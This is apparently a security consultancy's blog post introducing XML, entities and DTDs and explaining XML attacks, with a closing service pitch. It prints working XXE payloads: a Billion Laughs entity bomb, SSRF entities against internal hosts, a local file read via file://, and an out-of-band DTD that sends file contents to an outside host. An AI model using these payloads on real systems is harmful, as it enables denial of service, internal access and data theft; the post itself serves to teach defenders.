XML – An Overview Banner
XML – An Overview Banner

What Are the Risks of XML? – Blog Series – Part #01

The eXtensible Markup Language (XML) is one of the most widely used languages to represent hierarchical data. The popularity of XML goes hand in hand with the use of AJAX [9] at the dawn of the modern Internet [2]. Although XML has been superseded as the Internet's leading data exchange format by JSON [2], the format has left its mark on today's technology landscape. After all, whatever you do on your PC these days, you are—consciously or unconsciously—most likely using XML.

Here are some relevant examples: Microsoft's Office files, i.e. .docx, .xlsx, or .pptx, use XML internally. SVG, a widely used file format for vector graphics, is directly based on XML. The search engine Shodan [8] currently lists more than three million devices and servers that use XML for data exchange.¹ In total, the file format archive lists 185 file formats that include XML [3].² We will report on the different use cases of XML in more detail in the second post of this series.

But why is XML security-relevant and what has to be considered while using it? The OWASP Top 10 [1] lists the biggest security risks for web applications and has generally established itself as a de facto-standard in the field of web security. In the 2017 version of the Top 10 list, XML External Entity (XXE) attacks were ranked fourth.³ XXE attacks are just one type of attack based on or targeting XML. In general, XML enables a wide variety of attack classes, including Local File Inclusion, Server-Side Request Forgery, and Denial of Service. This  vast range of different attack possibilities makes an understanding of XML and the attacks on the format an important part of any security analysis.

In this blog series, we would like to explain the XML data format and selected attacks on the format, and deal with the typical scenarios in which it is used.


XML – An Introduction

XML Syntax

The API Lifecycle contains security aspects in every phase

XML is specified by the World Wide Web Consortium [4]. The format allows data to be represented in a tree-like hierarchical structure. It is therefore often used for serializing information. XML has a strictly defined structure: each element has a tag and optionally attributes, a value, and child elements. An example of the different elements can be seen in Listing 1.

An element is identified by the tag. If an element has no value, it can be self-closing (<element/>), otherwise each element has an opening and closing tag (<element>...</element>). Attributes are key=value pairs stored in the tag of an element. Values are located between the tags and must not themselves contain XML syntax.

If text—which does contain elements of XML syntax—be included in a document, it must be enclosed by the <![CDATA[...]]> element. This results in the parser not interpreting the enclosed text as XML and not attempting to parse it.

<?xml version="1.0" encoding="utf-8"?> <company name="Hackmanit" location="Bochum"> <services> <service>training</service> <service>penetration testing</service> </services> <areas> <area name="web security"/> <area name="single sign-on" short="sso"/> <area name="tls"/> </areas> </company>

XML Elements – An overview of the different types. (Listing 1)


What Are XML Entities?

To escape XML syntax, so-called entities are used—anyone who has ever read HTML code knows the syntax. For example, to display the symbol < you can use the entity &lt;, where lt is the entity's name. The ampersand references the character value that is stored in the entity lt.

The special feature of these entities is that in addition to predefined entities—which escape XML syntax—there is also the possibility to define your own entities. This is possible through a so-called Document Type Definition (DTD). DTDs are part of the XML specification and are actually intended to define the structure and types of the document. What makes the DTD and the entities especially relevant for a security analysis is the ability to access local and remote data.

There are four different types of entities that can be defined using a DTD. There are general and parameter entities:

  • General entities work similarly to the predefined entities like &lt;. That is, they are replaced in the XML by a predefined string.
  • Parameter Entities are only valid within the DTD and can be used to parameterize other aspects of the DTD. These are called—similar to the General Entity—only with a % instead of the &: %parameterEntity;

These entities can be either Internal or External:

  • Internal Entities are effectively predefined strings that are stored in the DTD.
  • External entities, on the other hand, are strings that come from an external source. The sources can be local files as well as files from a remote server. To achieve this, the SYSTEM keyword is used. This specifies that the protocol at the beginning of the following text should be executed. For example, an external file should be loaded via file:// or http://.

Listing 2 contains examples for all four types of entities described before.

xml version="1.0"?> <!DOCTYPE data [ <!ENTITY internalGeneral "This is an internally defined general entity."> <!ENTITY externalGeneral SYSTEM "local-file.txt"> <!ENTITY % internalParameter "<!ENTITY ent 'Im available if %internalParameter; is called'>" > %internalParameter; <!ENTITY % externalParameter SYSTEM "http://example.com/external.dtd" > %externalParameter; ]> ...

DTD Entities – Examples of the four different types. (Listing 2)


What Are the XML Attacks?

As already mentioned, there are different types of attacks that are possible using XML. In the following, we present selected attacks and explain how they work. For a detailed overview of more known attacks, there are many good sources, e.g. the XXE Cheat Sheet [5].

Denial of Service

Denial of Service (DoS) attacks are designed to overload a software or service. Legitimate requests can no longer be processed, effectively taking the service out of service. This can happen through misbehavior that causes the service to crash or data that requires computing power to process, rendering the service unusable.

In the case of XML, the idea is similar to that of an archive bomb [6]: A small XML document is constructed, which causes the service to enter an infinite loop or take up an unexpected amount of memory during parsing.

Listing 3 shows an example of the so-called “Billion-Laughs” attack. This attack exploits the functionality of DTDs that allows entities to recursively reference other entities. First, an entity a0 is defined which contains the text lol. This entity is then referenced in the next entity a1. This means that a1 contains the text lol 10 times after resolving the references. Then, in entity a2, a1 is referenced again. Thus, after resolving the references, a2 contains the text lol 10x10 times. This procedure can be repeated more often until the desired number of levels of recursion or the desired factor is reached. In our example, the entity lol ends up containing the text lol 10¹⁰ (i.e., 10 billion) times.

To store a string of this length in Java requires about 60 GB of memory [7].

<!DOCTYPE data [ <!ENTITY a0 "lol" > <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"> <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"> <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"> <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;"> ... <!ENTITY lol "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;"> ]>

Billion-Laugh Example of a DoS attack [5]. (Listing 3)


Server-Side Request Forgery (SSRF)

External entities can be used to integrate external data. This functionality can be abused to make a vulnerable server send malicious requests. If the vulnerable server has privileged rights on the target service, this request can read sensitive data or (if the GET requests allow parameters) change data. This attack class can also allow requests to be sent to systems that are only accessible via internal networks or are protected by a firewall.

The first example in Listing 4 shows how the file.xml file is fetched in from an external server. In this context, the example.com server is only accessible to the vulnerable server that parses the XML but not to the attacker (secured against external access). This attack still allows the attacker to read the data in file.xml. The second example shows how in a similar scenario a GET request is used to set new data at the server

Example 1: External file from a secured system [5].

<!DOCTYPE data [ <!ENTITY remote SYSTEM "http://example.com/file.xml"> ]> <data>&remote;</data>

Example 2: GET request to a secured system.
<!DOCTYPE data [ <!ENTITY remote SYSTEM "http://example.com?new_pw=123456"> ]> <data>&remote;</data>

SSRF Attacks – Example of different SSRF attacks using External General Entities. (Listing 4)


Local File Inclusion

This type of attack uses the DTD syntax to read local files and information. This information is then inserted into the XML document. In case the XML document is returned as a response or displayed in an application, the information can be stolen.

Listing 5 shows an example of reading a file from a Linux system. The content of the file is present in the XML document after parsing and can—depending on the application—be accessible to an attacker.

<!DOCTYPE data [ <!ENTITY file SYSTEM "file:///sys/power/image_size"> ]>

Local File Inclusion – An Example attack with External General Entities [5]. (Listing 5)


If there is no direct feedback, an indirect channel can also be used to extract the data (out-of-band attacks). This is possible through parameter entities, which are also resolved if they are located in the URL of an external entity. There are some limitations in the DTD syntax that should not actually allow this approach. However, the restrictions can often be circumvented by loading external DTDs.

Listing 6 shows how to load an external DTD in the parsed XML document. This external DTD loads a file from local storage (as in Listing 5), but does not insert the contents of the file into the XML document directly. Instead, the file content is appended as a parameter to a URL that is called afterwards. From the request to the URL, the contents of the local file can eventually be read.

Malicious XML document that loads an external DTD:

<!DOCTYPE data SYSTEM "http://example.com/parameter-entity-oob.dtd"> <data>&send;</data>

DTD available at http://example.com/parameter-entity-oob.dtd:
<!ENTITY % file SYSTEM "file:///sys/power/image_size"> <!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>"> %all;

Out-Of-Band Attack – An Example [5]. (Listing 6)




Part #02 – Where Is XML Used in Practice?

The second part of the blog series on the XML format deals with the answer to this question. The blog post provides information about the scenarios in which XML is used and helps you to uncover potential vulnerabilities in your systems.

Blog Series – What Are the Risks of XML? – All parts at a glance

Part #01 – XML – An Overview

Part #02 – Where Is XML Used in Practice?

Part #03 – Finding XXE Attacks in 3 Steps ---> Soon


Follow us on X (Twitter) or Linkedin and don't miss any of our future blog posts.




¹ https://www.shodan.io/search?query=%22Content-Type%3A+text%2Fxml%22 searches for all entries in the database which have Content-Type: text/xml in the HTTP header.

² https://fileinfo.com/ has listed 126 file types that use XML directly and 910 file types where XML plays a role in the description.

³ In the latest version of 2021, XXE attacks are no longer listed separately, but are included in a larger category. The category "Security Misconfiguration" is listed in fifth place.

⁴ The names and texts themselves are not relevant. The name of the attack originates from the original example with the text lol (laughing-out-loud), meaning "billions of laughs".

⁵ Setting values via GET requests should generally be avoided [10] and sensitive data should also not appear in the URL parameters of a GET request [11].



[1] https://owasp.org/Top10/

[2] https://www.toptal.com/web/json-vs-xml-part-1

[3] http://fileformats.archiveteam.org/wiki/Category:XML_based_file_formats

[4] https://www.w3.org/TR/2008/REC-xml-20081126/

[5] https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html

[6] https://de.wikipedia.org/wiki/Archivbombe

[7] https://www.javamex.com/tutorials/memory/string_memory_usage.shtml

[8] https://help.shodan.io/the-basics/what-is-shodan

[9] https://developer.mozilla.org/en-US/docs/Web/Guide/AJAX

[10] https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET

[11] https://cwe.mitre.org/data/definitions/598.html



Our Experts Develop the Optimal Solution for You

XML Parsing – XML Security – SOAP

Are you faced with the decision of how to securely process XML and optimally protect your customer data? Or are you already using XML and wondering if your implementation is secure?

We will be glad to advise you; contact us for a no-obligation initial consultation. We support you with the following services and solutions:

IT Security Consulting  |  Training   |  Penetration Tests

Don't hesitate and find your way to secure APIs with us. We look forward to supporting you with your projects.


Prof. Dr. Juraj Somorovsky

Your Contact for XML Security and SOAP

Prof. Dr. Juraj Somorovsky